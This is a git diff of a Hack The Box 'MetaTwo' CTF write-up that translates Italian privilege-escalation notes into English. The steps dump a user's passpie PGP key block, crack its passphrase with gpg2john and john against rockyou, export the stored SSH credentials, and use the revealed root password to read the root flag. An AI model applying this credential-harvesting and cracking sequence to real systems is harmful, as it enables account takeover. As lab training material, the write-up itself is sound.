--- a/CTF-HackTheBox/Easy/MetaTwo/9. Privilegie Escalation.md
+++ b/CTF-HackTheBox/Easy/MetaTwo/9. Privilegie Escalation.md
@@ -1,13 +1,15 @@
-1) Ci st nella directory una cartella ".passpie": cd passpie
-2) Vediamo cosa contiene questa directory: ls -all
+1) There is a ".passpie" folder in the directory: cd passpie
+2) Let's see what this directory contains: ls -all
+```
 total 24
 dr-xr-x--- 3 jnelson jnelson 4096 Oct 25 12:52 .
 drwxr-xr-x 4 jnelson jnelson 4096 Oct 25 12:53 ..
 -r-xr-x--- 1 jnelson jnelson    3 Jun 26 13:57 .config
 -r-xr-x--- 1 jnelson jnelson 5243 Jun 26 13:58 .keys
 dr-xr-x--- 2 jnelson jnelson 4096 Oct 25 12:52 ssh
-
-4) Vediamo cosa contiene il file .keys: cat .keys
+```
+4) Let's see what the .keys file contains: cat .keys
+```
 -----BEGIN PGP PUBLIC KEY BLOCK-----
 
 mQSuBGK4V9YRDADENdPyGOxVM7hcLSHfXg+21dENGedjYV1gf9cZabjq6v440NA1
@@ -95,12 +97,14 @@ V9YCGwwACgkQOHd1w1dF0gOm5gD9GUQfB+Jx/Fb7TARELr4XFObYZq7mq/NUEC+P
 o3KGdNgA/04lhPjdN3wrzjU3qmrLfo6KI+w2uXLaw+bIT1XZurDN
 =7Uo6
 -----END PGP PRIVATE KEY BLOCK-----
-
-5) Copiamo la Chiave privata in locale con nano: nano id_rsa
-6) La portiamo in un file che può leggere john the ripper:
+```
+5) Let's copy the private key locally with nano: nano id_rsa
+6) We put it in a file that john the ripper can read:
+```
 gpg2john id_rsa > id_rsaHash
-
+```
 7) Poi facciamo un attacco al dizionario cho john:
+```
 john  id_rsaHash    --wordlist=/usr/share/wordlists/rockyou.txt
 
 
@@ -115,12 +119,13 @@ blink182         (Passpie)    <--- Password Scoperta
 1g 0:00:00:03 DONE (2022-12-03 07:41) 0.2732g/s 44.80p/s 44.80c/s 44.80C/s ginger..blink182
 Use the "--show" option to display all of the cracked passwords reliably
 Session completed. 
-
+```
 8) Ora nella directory /home/jnelson creiamo un file vuoto: touch pass
-9) Dentro questo file andiamo a sovrascriverlo con le password che stanno nella directory  /home/jnelson/.passpie/ssh, però le decriptiamo usando la Passphrase scoperta con john the ripper: passpie export pass
+9) Inside this file we are going to overwrite it with the passwords that are in the /home/jnelson/.passpie/ssh directory, but we decrypt them using the Passphrase discovered with john the ripper: passpie export pass
 
-10) Andiamo a vedere le password racchiuse nel file "pass": cat pass
+10) Let's see the passwords enclosed in the "pass" file: cat pass
 credentials:
+```
 - comment: ''
   fullname: root@ssh
   login: root
@@ -135,13 +140,14 @@ credentials:
   password: !!python/unicode 'Cb4_JmWM8zUZWMu@Ys'
 handler: passpie
 version: 1.0
-
-11) Abbiamo scoperto la password root: 
+```
+11) We figured out the root password: 
       root:p7qfAZt4_A1xo_0x
 12) su root
 13) root@meta2:/home/jnelson# cd /root
+```
       root@meta2:~# ls
        restore  root.txt
       root@meta2:~# cat root.txt
         414bde0f6c257ee3bf6b40171a6dd380   <-- root flag
-
+```
